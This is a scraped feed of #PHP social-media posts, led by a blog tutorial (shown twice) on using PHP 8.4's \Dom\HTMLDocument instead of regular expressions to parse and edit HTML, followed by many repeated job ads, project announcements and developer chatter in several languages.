Next, extract the new element from the new DOM, and import it into the original DOM:

 PHP$element = $dom->importNode( $newDom->firstChild, true ); 

The element now needs to be inserted somewhere in the original DOM. In this case, get the h2, tell its parent node to insert the new node before the h2:

 PHP$h2 = $dom->querySelector( "h2" );$h2->parentNode->insertBefore( $element, $h2 );echo $dom->saveHTML();

Out pops:

 HTML<div id="page">   <main>      <h1>Title</h1>      <h2>Hello</h2>   </main></div>

An alternative is to use the appendChild() method. Note that it appends it to the end of the children. For example:

 PHP$div = $dom->querySelector( "#page" );$div->appendChild( $element );echo $dom->saveHTML();

Produces:

 HTML<div id="page">   <main>      <h2>Hello</h2>   </main>   <h1>Title</h1></div>

And more?

I've only scratched the surface of what the new 8.4 HTML Parser can do. I've already rewritten lots of my yucky old preg_ code to something which (hopefully) is less likely to break in catastrophic ways.

If you have any other tips, please leave a comment.

#HTML #HTML5 #php

Stop using preg_* on HTML and start using \Dom\HTMLDocument instead

https://shkspr.mobi/blog/2025/05/stop-using-preg_-on-html-and-use-domhtmldocument/

It is a truth universally acknowledged that a programmer in possession of some HTML will eventually try to parse it with a regular expression.

This makes many people very angry and is widely regarded as a bad move.

In the bad old days, it was somewhat understandable for a PHP coder to run a quick-and-dirty preg_replace() on a scrap of code. They probably could control the input and there wasn't a great way to manipulate an HTML5 DOM.

Rejoice sinners! PHP 8.4 is here to save your wicked souls. There's a new HTML5 Parser which makes everything better and stops you having to write brittle regexen.

Here are a few tips - mostly notes to myself - but I hope you'll find useful.

Sanitise HTML

This is the most basic example. This loads HTML into a DOM, tries to fix all the mistakes it finds, and then spits out the result.

 PHP$html = '<p id="yes" id="no"><em>Hi</div><h2>Test</h3><img />';$dom = \Dom\HTMLDocument::createFromString( $html, LIBXML_NOERROR | LIBXML_HTML_NOIMPLIED , "UTF-8" );echo $dom->saveHTML();

It uses LIBXML_HTML_NOIMPLIED because we don't want a full HTML document with a doctype, head, body, etc.

If you want Pretty Printing, you can use my library.

Get the plain text

OK, so you've got the DOM, how do you get the text of the body without any of the surrounding HTML

 PHP$html = '<p><em>Hello</em> World!</p>';$dom = \Dom\HTMLDocument::createFromString( $html, LIBXML_NOERROR , "UTF-8" );echo $dom->body->textContent;

Note, this doesn't replace images with their alt text.

Get a single element

You can use the same querySelector() function as you do in JavaScript!

 PHP$element = $dom->querySelector( "h2" );

That returns a pointer to the element. Which means you can run:

 PHP$element->setAttribute( "id", "interesting" );echo $dom->querySelector( "h2" )->attributes["id"]->value;

And you will see that the DOM has been manipulated!

Search for multiple elements

Suppose you have a bunch of headings and you want to get all of them. You can use the same querySelectorAll() function as you do in JavaScript!

To get all headings, in the order they appear:

 PHP$headings = $dom->querySelectorAll( "h1, h2, h3, h4, h5, h6" );foreach ( $headings as $heading ) {   // Do something}

Advanced Search

Suppose you have a bunch of links and you want to find only those which point to "example.com/test/". Again, you can use the same attribute selectors as you would elsewhere

 PHP$dom->querySelectorAll( "a[href^=https\:\/\/example\.com\/test\/]" );

Replacing content

Sadly, it isn't quite as simple as setting the innerHTML. Each search returns a node. That node may have children. Those children will also be node which, themselves, may have children, and so on.

Let's take a simple example:

 PHP$html = '<h2>Hello</h2>';$dom = \Dom\HTMLDocument::createFromString( $html, LIBXML_NOERROR | LIBXML_HTML_NOIMPLIED, "UTF-8" );$element = $dom->querySelector( "h2" );$element->childNodes[0]->textContent = "Goodbye";echo $dom->saveHTML();

That changes "Hello" to "Goodbye".

But what if the element has child nodes?

 PHP$html = '<h2>Hello <em>friend</em></h2>';$dom = \Dom\HTMLDocument::createFromString( $html, LIBXML_NOERROR | LIBXML_HTML_NOIMPLIED, "UTF-8" );$element = $dom->querySelector( "h2" );$element->childNodes[0]->textContent = "Goodbye";echo $dom->saveHTML();

That outputs <h2>Goodbye<em>friend</em></h2> - so think carefully about the structure of the DOM and what you want to replace.

Adding a new node

This one is tricky! Let's suppose you have this:

 HTML<div id="page">   <main>      <h2>Hello</h2>

You want to add an <h1> before the <h2>. Here's how to do this.

First, you need to construct the DOM:

 PHP$html = '<div id="page"><main><h2>Hello</h2>';$dom = \Dom\HTMLDocument::createFromString( $html, LIBXML_NOERROR | LIBXML_HTML_NOIMPLIED, "UTF-8" );

Next, you need to construct an entirely new DOM for your new node.

 PHP$newHTML = "<h1>Title</h1>";$newDom = \Dom\HTMLDocument::createFromString( $newHTML, LIBXML_NOERROR | LIBXML_HTML_NOIMPLIED, "UTF-8" );

Next, extract the new element from the new DOM, and import it into the original DOM:

 PHP$element = $dom->importNode( $newDom->firstChild, true ); 

The element now needs to be inserted somewhere in the original DOM. In this case, get the h2, tell its parent node to insert the new node before the h2:

 PHP$h2 = $dom->querySelector( "h2" );$h2->parentNode->insertBefore( $element, $h2 );echo $dom->saveHTML();

Out pops:

 HTML<div id="page">   <main>      <h1>Title</h1>      <h2>Hello</h2>   </main></div>

An alternative is to use the appendChild() method. Note that it appends it to the end of the children. For example:

 PHP$div = $dom->querySelector( "#page" );$div->appendChild( $element );echo $dom->saveHTML();

Produces:

 HTML<div id="page">   <main>      <h2>Hello</h2>   </main>   <h1>Title</h1></div>

And more?

I've only scratched the surface of what the new 8.4 HTML Parser can do. I've already rewritten lots of my yucky old preg_ code to something which (hopefully) is less likely to break in catastrophic ways.

If you have any other tips, please leave a comment.

#HTML #HTML5 #php

Just registered for PHPverse – a free virtual event to celebrate 30 years of PHP happening on Tuesday, 17 June.

https://lp.jetbrains.com/phpverse-2025/

#PHP #PHPverse

Just registered for PHPverse – a free virtual event to celebrate 30 years of PHP happening on Tuesday, 17 June.

https://lp.jetbrains.com/phpverse-2025/

#PHP #PHPverse

Some great tips to write regular expressions in PHP.

I don't particularly have the need to write verbose expressions, but alternative delimiters (mine is typically `@`) and named capture groups alone are game changers.

https://andycarter.dev/blog/readable-regex-in-php

#php

Some great tips to write regular expressions in PHP.

I don't particularly have the need to write verbose expressions, but alternative delimiters (mine is typically `@`) and named capture groups alone are game changers.

https://andycarter.dev/blog/readable-regex-in-php

#php

Note to #php developers who want to distribute #docker images: please consider making your base image *without* the webserver first, and a separate "all-in-one" image if you want to provide something for end users.

@joomla maintainers are in progress to define the minimum requirements for #joomla 6. In question is #php #mysql #mariadb #postgresql #apache #ngnix #iis
What's your suggestion?

for the past few years, i'm sure many of you have read my many lamentations about the death of the old, small web many of us grew up with.

there are tons of static site generators out there, but none of them did what i wanted: something that could build an entire site without futzing with javascript and library dependencies. i wanted something that we would have had in 2005, but didn't have in 2025.

in january, i decided to do something about it instead of whining. i started gluing together a few php scripts i had been using to build blogs, rss feeds and mini homepages. i even wrote a new mini markup language.

i thought it would take me a week. it took >3 months. 😅

it ran for the past month as globaltalk.network's interactive site, and many of you asked if i'd ever let other people spin up an instance. i can finally say: yes!

today, kiki is officially finished and released for public use. named after my little black house demon, it's small, fast, and sometimes well behaved. and, it's all written in php without a single external dependency. just unzip and go.

it's released as shareware - in the oldest, finest, jankiest meaning of the word: you're free to goof around with and share the unregistered version. build your own little kiki instance, and customize the heck out of it until it feels like your own little home in the world wide web:

http://tomodashi.com/kiki

#kiki #homepage #worldWideWeb #smolWeb #smallWeb #php

for the past few years, i'm sure many of you have read my many lamentations about the death of the old, small web many of us grew up with.

there are tons of static site generators out there, but none of them did what i wanted: something that could build an entire site without futzing with javascript and library dependencies. i wanted something that we would have had in 2005, but didn't have in 2025.

in january, i decided to do something about it instead of whining. i started gluing together a few php scripts i had been using to build blogs, rss feeds and mini homepages. i even wrote a new mini markup language.

i thought it would take me a week. it took >3 months. 😅

it ran for the past month as globaltalk.network's interactive site, and many of you asked if i'd ever let other people spin up an instance. i can finally say: yes!

today, kiki is officially finished and released for public use. named after my little black house demon, it's small, fast, and sometimes well behaved. and, it's all written in php without a single external dependency. just unzip and go.

it's released as shareware - in the oldest, finest, jankiest meaning of the word: you're free to goof around with and share the unregistered version. build your own little kiki instance, and customize the heck out of it until it feels like your own little home in the world wide web:

http://tomodashi.com/kiki

#kiki #homepage #worldWideWeb #smolWeb #smallWeb #php

for the past few years, i'm sure many of you have read my many lamentations about the death of the old, small web many of us grew up with.

there are tons of static site generators out there, but none of them did what i wanted: something that could build an entire site without futzing with javascript and library dependencies. i wanted something that we would have had in 2005, but didn't have in 2025.

in january, i decided to do something about it instead of whining. i started gluing together a few php scripts i had been using to build blogs, rss feeds and mini homepages. i even wrote a new mini markup language.

i thought it would take me a week. it took >3 months. 😅

it ran for the past month as globaltalk.network's interactive site, and many of you asked if i'd ever let other people spin up an instance. i can finally say: yes!

today, kiki is officially finished and released for public use. named after my little black house demon, it's small, fast, and sometimes well behaved. and, it's all written in php without a single external dependency. just unzip and go.

it's released as shareware - in the oldest, finest, jankiest meaning of the word: you're free to goof around with and share the unregistered version. build your own little kiki instance, and customize the heck out of it until it feels like your own little home in the world wide web:

http://tomodashi.com/kiki

#kiki #homepage #worldWideWeb #smolWeb #smallWeb #php

for the past few years, i'm sure many of you have read my many lamentations about the death of the old, small web many of us grew up with.

there are tons of static site generators out there, but none of them did what i wanted: something that could build an entire site without futzing with javascript and library dependencies. i wanted something that we would have had in 2005, but didn't have in 2025.

in january, i decided to do something about it instead of whining. i started gluing together a few php scripts i had been using to build blogs, rss feeds and mini homepages. i even wrote a new mini markup language.

i thought it would take me a week. it took >3 months. 😅

it ran for the past month as globaltalk.network's interactive site, and many of you asked if i'd ever let other people spin up an instance. i can finally say: yes!

today, kiki is officially finished and released for public use. named after my little black house demon, it's small, fast, and sometimes well behaved. and, it's all written in php without a single external dependency. just unzip and go.

it's released as shareware - in the oldest, finest, jankiest meaning of the word: you're free to goof around with and share the unregistered version. build your own little kiki instance, and customize the heck out of it until it feels like your own little home in the world wide web:

http://tomodashi.com/kiki

#kiki #homepage #worldWideWeb #smolWeb #smallWeb #php

📢 SensioLabs recrute !

#Dev senior, lead developer, formateur (H/F) : rejoignez le créateur de #Symfony

Développez vos compétences avec des projets innovants, le partage avec l'équipe & grâce à un accès privilégié à l'open source 📖

📌 En savoir plus 👉 https://bit.ly/3E78hiR

#PHP #Recrutement #Opensource

📢 SensioLabs recrute !

#Dev senior, lead developer, formateur (H/F) : rejoignez le créateur de #Symfony

Développez vos compétences avec des projets innovants, le partage avec l'équipe & grâce à un accès privilégié à l'open source 📖

📌 En savoir plus 👉 https://bit.ly/3E78hiR

#PHP #Recrutement #Opensource

Hello Fediverse! I’m looking for a new role as a Senior Software Developer specializing in building extensions (or stores) on the Magento Open Source and Adobe Commerce platforms. I’d also be willing to learn Shopware. My target salary is $160,000 per year, and I work remotely.

https://linkedin.com/in/JosephLeedy

#AdobeCommerce #Magento #Shopware #PHP #OpenToWork #GetFediHired

Se ois kuulkaas rekryhommat auki Fennoalla.

Etsin softatiimiini kahta hyvää tyyppiä, 1x mid- ja 1x senior-devaajaa. Perustaitoina tulisi olla PHP ja JS, mutta erityisesti sennun kohdalla kaipaan taitoja myös siitä koodin yläpuolelta. Sisartiimiin etsitään myös yhtä senior-devaajaa.

1/4

(Kaikki buustaukset tervetulleita!)

#GetFediHired #FediRekry #Fennoa #Rekry #Työpaikka #Työpaikkailmoitus #Ohjelmistokehitys #PHP #JS #Taloushallinto #Tilitoimisto

We're hiring for a new PHP Developer to join the team at Studio 24. We're passionate about building a web that works for everyone. We design and build accessible websites and complex web applications and focus on projects with impact for public sector & non-profit clients.

If you'd like to work with a friendly and supportive team on projects for clients such as @w3c, RNIB, UK Parliament, CBM and other fantastic clients please see https://www.studio24.net/careers/php-developer/ #jobs #PHP #accessibility

We're hiring for a new PHP Developer to join the team at Studio 24. We're passionate about building a web that works for everyone. We design and build accessible websites and complex web applications and focus on projects with impact for public sector & non-profit clients.

If you'd like to work with a friendly and supportive team on projects for clients such as @w3c, RNIB, UK Parliament, CBM and other fantastic clients please see https://www.studio24.net/careers/php-developer/ #jobs #PHP #accessibility

We're hiring for a new PHP Developer to join the team at Studio 24. We're passionate about building a web that works for everyone. We design and build accessible websites and complex web applications and focus on projects with impact for public sector & non-profit clients.

If you'd like to work with a friendly and supportive team on projects for clients such as @w3c, RNIB, UK Parliament, CBM and other fantastic clients please see https://www.studio24.net/careers/php-developer/ #jobs #PHP #accessibility

I had to solve a problem where a PowerShell script would be distributed to clients that had to send mails. Putting email credentials in the script was not an option, so I put together a web-accessible API that allows me to send mail from a script without putting credentials at risk or relying on third-party mail libraries.
Sharing is caring, so here it is for you to self-host.
#php #api #sendmail #scripting #selfhosted #opensource #oss
https://github.com/soulflyman/CuckooPost

Občas něco naprogramuju v #Python a oblíbil jsem si možnost vytvářet třídy v třídách, což používám hlavně pro buildery. Občas mě zamrzelo, že to neumí i #PHP, takže když jsem si dnes všiml tohoto RFC, udělalo mi to #dobréRáno 😊
https://wiki.php.net/rfc/short-and-inner-classes
#developer

I'm looking for a Senior PHP Developer position. I'm in NYC, but remote position welcome. I can work with WordPress, Drupal, or Laravel. Got a older PHP system that needs modernizing? I can help with that too. Prefer U.S. timezones (UTC-4 thru UTC-7).

Get in touch.

#FediHire #PHP #WordPress #Drupal

I'm looking for a Senior PHP Developer position. I'm in NYC, but remote position welcome. I can work with WordPress, Drupal, or Laravel. Got a older PHP system that needs modernizing? I can help with that too. Prefer U.S. timezones (UTC-4 thru UTC-7).

Get in touch.

#FediHire #PHP #WordPress #Drupal

Hey, folks! I’m looking for a Staff Software Engineer to join my team (API Core) at #Mailchimp.

Some of the things we work on: #PHP, #REST, #OpenAPI, #OAuth2, #APIGovernance, and more.

We are stewards of our public #APIs, and we collaborate with other capabilities teams to ensure APIs are developed according to our standards and processes. You would work directly with me on a daily basis.

This position is in Atlanta or New York.

https://jobs.intuit.com/job/atlanta/staff-software-engineer-api-core-team/27595/76329932512

#GetFediHired #FediHire

The PHP project has put out the call for release manager volunteers for PHP 8.5!

Candidates should be confident about merging pull requests without breaking BC, doing bug triage, liaising with previous RMs, and getting the branch in good shape. At least one candidate should be a core dev who can assess more technical PR's. Others do not need to have deep knowledge of internals but should understand above mentioned points.

Reply on the mailing list to volunteer.

https://news-web.php.net/php.internals/126733

#PHP

@raiderrobert I'm making customized cms for few customers and I'm more friendly with #python than #php, so #wagtail looks as good solution than #wordpress. Wagtails StreamFields are AWESOME. Building selfhosted site right now - not easy, but i'm still surprised how it works ))

The PHP project has put out the call for release manager volunteers for PHP 8.5!

Candidates should be confident about merging pull requests without breaking BC, doing bug triage, liaising with previous RMs, and getting the branch in good shape. At least one candidate should be a core dev who can assess more technical PR's. Others do not need to have deep knowledge of internals but should understand above mentioned points.

Reply on the mailing list to volunteer.

https://news-web.php.net/php.internals/126733

#PHP

Years ago I created a #php #mysql #comics #database
https://sourceforge.net/projects/madcollector/

DM me If you'd be interested in reviving it.

On a scale from "never to happens all the time", how often do you change model/entity names and have to update the database table in production projects?

#php #webdev

On a scale from "never to happens all the time", how often do you change model/entity names and have to update the database table in production projects?

#php #webdev

なぜPHPファイルは <?php が省略できないのか #PHP - Qiita

https://qiita.com/tadsan/items/ddd1f8c8289b064cf923

なぜPHPファイルは <?php が省略できないのか #PHP - Qiita

https://qiita.com/tadsan/items/ddd1f8c8289b064cf923

Any #WebDev out there have an HTML block editor / page builder, they like?

I've hacked something together with #vuejs and #tinymce but it's cumbersome and janky, and think its time to cut my losses.

But I don't know what to go to. I'm in #php now, but will be rebuilding in #elixir very soon, so if there is something in Elixir / #phoenix that's decent off the shelf, i'd be curious to see that.

#tailwind css support for this would be extra cool.

高町さん、かっこいい! #php

OSSは決して遠い世界じゃない。2年前までコントリビューション未経験だった、PHPコア開発者からのメッセージ - Findy Engineer Lab: https://findy-code.io/engineer-lab/sakitakamachi

There is a #PHP value, which is not even equal to itself.
($a === $a) is false!

If you don't know about it, here is a tip : it is not a number.

#phptip #phptrick

https://php-tips.readthedocs.io/en/latest/tips/is_not_a_nan.html

Dites, c'est possible d'observer le trafic FPM sur une socket ? J'ai un petit soucis avec NextCloud dans un cas bien spécifique. Au début c'était HAProxy qui posait problème, mais de ce côté c'est réglé. Par contre, j'ai #NGinX qui ferme la connexion vers HAProxy prématurément lors du #streaming d'un morceau de musique. Du coup je voudrais voir si c'est NGinX qui a un problème, ou #PHP #FPM ?
NGinX et PHP-FPM communiquent via une socket, sinon j'aurais tout simplement fait un tcpdump...

Dites, c'est possible d'observer le trafic FPM sur une socket ? J'ai un petit soucis avec NextCloud dans un cas bien spécifique. Au début c'était HAProxy qui posait problème, mais de ce côté c'est réglé. Par contre, j'ai #NGinX qui ferme la connexion vers HAProxy prématurément lors du #streaming d'un morceau de musique. Du coup je voudrais voir si c'est NGinX qui a un problème, ou #PHP #FPM ?
NGinX et PHP-FPM communiquent via une socket, sinon j'aurais tout simplement fait un tcpdump...

PHP 8.4.4 Released

https://www.php.net/releases/8_4_4.php

Discussions: https://discu.eu/q/https://www.php.net/releases/8_4_4.php

#php #programming #release

PHP 8.4.4 Released

https://www.php.net/releases/8_4_4.php

Discussions: https://discu.eu/q/https://www.php.net/releases/8_4_4.php

#php #programming #release

Does anybody have experience with developing and hosting #PHP #Composer packages on @Codeberg and then distributing them through #Packagist?

I was able to set up a Packagist webhook on #Codeberg but am wondering if there's any best practices or pitfalls to be aware of. Most packages are on #GitHub, so this would be a more unique setup.

L'alternative à Instagram, @pixelfed monte de plus en plus en puissance. Cette semaine, je vais vous montrer sur mon blog comment publier en #php une photo sur une instance #pixelfed.

🇫🇷 https://lefevre.dev/fr/blog/publier-facilement-post-pixelfed-php/
🇬🇧 https://lefevre.dev/posts/publish-easily-post-pixelfed-php/

#opensource

L'alternative à Instagram, @pixelfed monte de plus en plus en puissance. Cette semaine, je vais vous montrer sur mon blog comment publier en #php une photo sur une instance #pixelfed.

🇫🇷 https://lefevre.dev/fr/blog/publier-facilement-post-pixelfed-php/
🇬🇧 https://lefevre.dev/posts/publish-easily-post-pixelfed-php/

#opensource

Hey mes amis fan de PHP, @afup préfère faire son AG en ligne sur Bluesky plutôt que Mastodon parce qu'il manque 126 abonnés sur son compte Mastodon

Votre mission si vous l'acceptez, est d'encourager un max de membres de la communauté PHP à suivre le compte @afup et ainsi les convaincre de faire le live sur Mastodon

Cap ou pas Cap ?

cc @Djyp @dunglas @enuts_ @soyuka @symfony @SymfonyStation @mykiwi @fabpot @phparch @php @brendt @onestlatech @ApiPlatform @matthiasnoback @yoandev @Girgias
#php

🎥 Get an exclusive sneak peak at Laravel Cloud, the new PaaS by the Laravel team.

Florian Beer gave this talk at our Laravel Switzerland Meetup on January 30th in Zürich.

https://youtu.be/Au_DWef9vvA

#laravel #php

#WordPress as a git repo

https://adamadam.blog/2025/01/08/wordpress-as-a-git-repo/

"I’ve turned WordPress into a markdown editor, a git client, and a git server. It’s all dependency-free #PHP code. It works in Playground, on any cheap hosting, and it could be merged into WordPress core."

via @adamziel

#WordPress as a git repo

https://adamadam.blog/2025/01/08/wordpress-as-a-git-repo/

"I’ve turned WordPress into a markdown editor, a git client, and a git server. It’s all dependency-free #PHP code. It works in Playground, on any cheap hosting, and it could be merged into WordPress core."

via @adamziel

Wikipedia is looking for brave #php developers to help their mission. It's #remote

Staff"
https://job-boards.greenhouse.io/wikimedia/jobs/6126716?gh_src=f74a1ed11us

Senior:
https://grnh.se/58ef55971us

#getfedihired
/added the second link/

Wait... what?? 😓

Ok #PHP folks... what are we using now for finding code duplication?? Does #PHPStan do this? 🤔

Wikipedia is looking for brave #php developers to help their mission. It's #remote

Staff"
https://job-boards.greenhouse.io/wikimedia/jobs/6126716?gh_src=f74a1ed11us

Senior:
https://grnh.se/58ef55971us

#getfedihired
/added the second link/

This project looks promising:

"Goodnews is a PHP-based social media platform like Mastodon based on the ActivityPub protocol."

Highlights:

- PHP 8.2+, Hyperf, and Swoole
- AGPL 3.0
- ActivityPub
- Mastodon API compatibility
- Backend and frontend are separate projects
- Active development

https://github.com/goodnews-project/goodnews-backend

#PHP #Goodnews #ActivityPub

This project looks promising:

"Goodnews is a PHP-based social media platform like Mastodon based on the ActivityPub protocol."

Highlights:

- PHP 8.2+, Hyperf, and Swoole
- AGPL 3.0
- ActivityPub
- Mastodon API compatibility
- Backend and frontend are separate projects
- Active development

https://github.com/goodnews-project/goodnews-backend

#PHP #Goodnews #ActivityPub

This project looks promising:

"Goodnews is a PHP-based social media platform like Mastodon based on the ActivityPub protocol."

Highlights:

- PHP 8.2+, Hyperf, and Swoole
- AGPL 3.0
- ActivityPub
- Mastodon API compatibility
- Backend and frontend are separate projects
- Active development

https://github.com/goodnews-project/goodnews-backend

#PHP #Goodnews #ActivityPub

This project looks promising:

"Goodnews is a PHP-based social media platform like Mastodon based on the ActivityPub protocol."

Highlights:

- PHP 8.2+, Hyperf, and Swoole
- AGPL 3.0
- ActivityPub
- Mastodon API compatibility
- Backend and frontend are separate projects
- Active development

https://github.com/goodnews-project/goodnews-backend

#PHP #Goodnews #ActivityPub

Wait... what?? 😓

Ok #PHP folks... what are we using now for finding code duplication?? Does #PHPStan do this? 🤔

I've worked with dates and times in several programming languages, and I have to say that the best is easily PHP (since the big refactor in, what was it, 5.6?).

The worst is easily Javascript.

#PHP #Javascript #Typescript #Node

I've worked with dates and times in several programming languages, and I have to say that the best is easily PHP (since the big refactor in, what was it, 5.6?).

The worst is easily Javascript.

#PHP #Javascript #Typescript #Node

PHPUnitでカバレッジレポートの生成が遅すぎるときの対応
https://qiita.com/mu7kata/items/79a763e0c37f277fa74d?utm_campaign=popular_items&utm_medium=feed&utm_source=popular_items

#qiita #PHP #PHPUnit #カバレッジ #テスト自動化

Autonomous DatabaseのSELECT AIを使用して、他のOracle Databaseに格納されているデータに対して自然言語で問合せを行う
https://qiita.com/500InternalServerError/items/e2119c3b15869e25c5bc?utm_campaign=popular_items&utm_medium=feed&utm_source=popular_items

#qiita #PHP #AI #oci #oraclecloud #autonomous_database

I really appreciate the journey @PixelFed is on. As @dansup said here https://mastodon.social/@dansup/113910761084901138 the entire Fediverse is growing together with them.

The only thing I don't like about Pixelfed is that it is written in PHP.
That is just sad, sorry.
A year ago I was considering self-hosting Pixelfed and this was the only blocker for me personally.
Hope this will change in the future:)

#Pixelfed #Fediverse #PHP

Aunque llevo años por aquí, ésta es mi #presentación.

Soy ingeniero de software con +20 años programando en #PHP, haciendo mis pinitos en #NodeJS, #Python y #Golang, y trabajo en remoto desde 2007.

Escribí durante años en blogs profesionales (e incluso un libro), empecé en el #podcasting en el 2007 con @kafelog y madrugo para ir a hacer #fitboxing.

Me gusta la tecnología, comer bien, el café, el vermú, la ciencia ficción, el terror cósmico y las zapatillas.

¡Hola! 👋🏻

This is one of the most useful tools I have built:

https://history.nix-packages.com

Working with multiple versions of whatever software you need for your legacy app is a breeze.

You want some specific version of #php #nodejs #golang or whatever else without it polluting your system? You're just one `nix-shell` command away!

#nix #nixos

In case someone is still using wp-tests-strapon, I just removed support for main/master/trunk branches for WordPress, so it is nessecary to test against a released version for the time being, but at least testing against WordPress 6.7.1 works now.

This is due to small discrepancies in the wordpress-develop codebase and the distributed version of WordPress that were enough to break things.

The new version, 0.1.7, should be on Packagist by now.

#WordPress #PHP

oh gods what that's SO CURSED

#PHP

oh gods what that's SO CURSED

#PHP

It reminds me of my early days with PHP—there was a certain charm in the chaos, a kind of misunderstood brilliance. But where PHP felt like a rebel carving its own path, Blazor feels like the refined evolution, bringing that same joy but with structure and clarity. #DevCommunity #Coding #php

Things I learned last year:

- PHP and JavaScript for web applications
- Python for AI and Machine Learning
- Rust for very performant software
- Go for networking software
- Vala for GNOME apps
- C is still relevant as long you keep it simple
- C++ is slowly becoming the FORTRAN of our age.

#Programming #WebDevelopment #SoftwareDevelopment #Software #PHP #Pyrhon #AI #ML #MachineLearning #Rust #Golang #Vala #GNOME #C #CPlusPlus

Things I learned last year:

- PHP and JavaScript for web applications
- Python for AI and Machine Learning
- Rust for very performant software
- Go for networking software
- Vala for GNOME apps
- C is still relevant as long you keep it simple
- C++ is slowly becoming the FORTRAN of our age.

#Programming #WebDevelopment #SoftwareDevelopment #Software #PHP #Pyrhon #AI #ML #MachineLearning #Rust #Golang #Vala #GNOME #C #CPlusPlus

oh gods what that's SO CURSED

#PHP

oh gods what that's SO CURSED

#PHP

the other #php #fediverse platform I know of is #Friendica

I have tagged Loupe 0.9 with some great new features and performance improvements! 🔥 Go check them out! https://github.com/loupe-php/loupe/releases/tag/0.9.0 #php #sqlite #search

I have tagged Loupe 0.9 with some great new features and performance improvements! 🔥 Go check them out! https://github.com/loupe-php/loupe/releases/tag/0.9.0 #php #sqlite #search

the #pixelfed surge also means a bigger #php footprint in the #fediverse

the #pixelfed surge also means a bigger #php footprint in the #fediverse

the #pixelfed surge also means a bigger #php footprint in the #fediverse

PHPでGoogle reCAPTCHA Enterpriseを実装してみる
https://qiita.com/aizunoinu/items/0207ff5a9bf4b7e748dd?utm_campaign=popular_items&utm_medium=feed&utm_source=popular_items

#qiita #PHP #初心者 #セキュリティ対策 #Google_reCAPTCHA #Google_reCAPTCHA_Enterprise

@dansup #php #laravel 💪💪

@dansup In most cases #PHP is faster than both #Python and #Ruby

What I want to happen is for #PixelFed and #Loops to become so popular, that it hast to be upgrade to #Rust just for the performance!

Today I stumbled across a DokuWiki running on release 2008-05-05 on #PHP 4.4.9 😱

I strongly advise against running such seriously outdated software (especially on the public Internet).

But I am also fascinated by it. The change log indicates that this wiki has been in constant use since back then, with the latest addition just a couple of days ago. I guess someone is strictly adhering to the rule of "never change a running system".

Today I stumbled across a DokuWiki running on release 2008-05-05 on #PHP 4.4.9 😱

I strongly advise against running such seriously outdated software (especially on the public Internet).

But I am also fascinated by it. The change log indicates that this wiki has been in constant use since back then, with the latest addition just a couple of days ago. I guess someone is strictly adhering to the rule of "never change a running system".

My employer is looking for a Staff Engineeer (PHP & Vue.js) in Berlin.

https://boards.greenhouse.io/clark71/jobs/7782973002

(You might or might not work with me in the future)

Edit: For now local only; you have to be/move to Berlin.

#fedihire #jobs #php #laravel #vue

I created an #ActivityPub library for #PHP which uses modern PHP 8.4 features. Each input is fully validated and fully typed, there's support for Signature header validating / generating and some other sweet stuff.

Note that it's currently in alpha, mainly because it's not tested yet and there are most likely many bugs, but tests are coming soon(ish).

Random fact: 3 bug reports for #PhpStorm were created in the process of creating the package.

https://github.com/RikudouSage/ActivityPub

I created an #ActivityPub library for #PHP which uses modern PHP 8.4 features. Each input is fully validated and fully typed, there's support for Signature header validating / generating and some other sweet stuff.

Note that it's currently in alpha, mainly because it's not tested yet and there are most likely many bugs, but tests are coming soon(ish).

Random fact: 3 bug reports for #PhpStorm were created in the process of creating the package.

https://github.com/RikudouSage/ActivityPub

If anyone can show me how to use #PHP to make a #GeminiProtocol request for a gemfile, please point me towards some answers.

If anyone can show me how to use #PHP to make a #GeminiProtocol request for a gemfile, please point me towards some answers.

Brexit means brexit!!

#PHP

Headed to the office for day 2 of my new job. I even managed to find a #PHP job, although it is #Laravel. Any good references (written, not a video or podcast person) for an experienced PHP coder getting up to speed with Laravel would be appreciated.

PHPStan 2.1: Support For PHP 8.4's Property Hooks, and More!

https://phpstan.org/blog/phpstan-2-1-support-for-php-8-4-property-hooks-more

Discussions: https://discu.eu/q/https://phpstan.org/blog/phpstan-2-1-support-for-php-8-4-property-hooks-more

#php #programming

PHPStan 2.1: Support For PHP 8.4's Property Hooks, and More!

https://phpstan.org/blog/phpstan-2-1-support-for-php-8-4-property-hooks-more

Discussions: https://discu.eu/q/https://phpstan.org/blog/phpstan-2-1-support-for-php-8-4-property-hooks-more

#php #programming

Symfonyで簡単なCRUDを作る
https://qiita.com/shimabox/items/0197645f35fa0c64d929?utm_campaign=popular_items&utm_medium=feed&utm_source=popular_items

#qiita #PHP #Symfony

Let's get you hired in 2025! Here are some roles Nextcloud is hiring for:

- Software engineers (PHP and frontend)
- Sales/account managers
- Sales engineers
- Localization manager
- B2B content writer
- Graphic designer
- Internships

See job listings here:
https://nextcloud.com/jobs/#openpositions

Great opportunities to work in #OpenSource #FOSS

Boost to your audience 🙏

#getfedihired #jobs #mastodon #newyear #hiring #SoftwareEngineering #writing #internships #php #vuejs #germany

Let's get you hired in 2025! Here are some roles Nextcloud is hiring for:

- Software engineers (PHP and frontend)
- Sales/account managers
- Sales engineers
- Localization manager
- B2B content writer
- Graphic designer
- Internships

See job listings here:
https://nextcloud.com/jobs/#openpositions

Great opportunities to work in #OpenSource #FOSS

Boost to your audience 🙏

#getfedihired #jobs #mastodon #newyear #hiring #SoftwareEngineering #writing #internships #php #vuejs #germany

Let's get you hired in 2025! Here are some roles Nextcloud is hiring for:

- Software engineers (PHP and frontend)
- Sales/account managers
- Sales engineers
- Localization manager
- B2B content writer
- Graphic designer
- Internships

See job listings here:
https://nextcloud.com/jobs/#openpositions

Great opportunities to work in #OpenSource #FOSS

Boost to your audience 🙏

#getfedihired #jobs #mastodon #newyear #hiring #SoftwareEngineering #writing #internships #php #vuejs #germany

Let's get you hired in 2025! Here are some roles Nextcloud is hiring for:

- Software engineers (PHP and frontend)
- Sales/account managers
- Sales engineers
- Localization manager
- B2B content writer
- Graphic designer
- Internships

See job listings here:
https://nextcloud.com/jobs/#openpositions

Great opportunities to work in #OpenSource #FOSS

Boost to your audience 🙏

#getfedihired #jobs #mastodon #newyear #hiring #SoftwareEngineering #writing #internships #php #vuejs #germany

PHPカンファレンス2024に参加しました
https://qiita.com/okawa-yzrh/items/15960a17fde4c2dd546a?utm_campaign=popular_items&utm_medium=feed&utm_source=popular_items

#qiita #PHP #Laravel #PHPカンファレンス

設定ファイルを上からユルユルと読んでいく（PHP-FPM編）
https://qiita.com/takahiro_fukushima/items/4c6468f000a0104877d0?utm_campaign=popular_items&utm_medium=feed&utm_source=popular_items

#qiita #PHP #Config #ポエム #php_fpm

Do you use #PHP? Do you benefit from it?

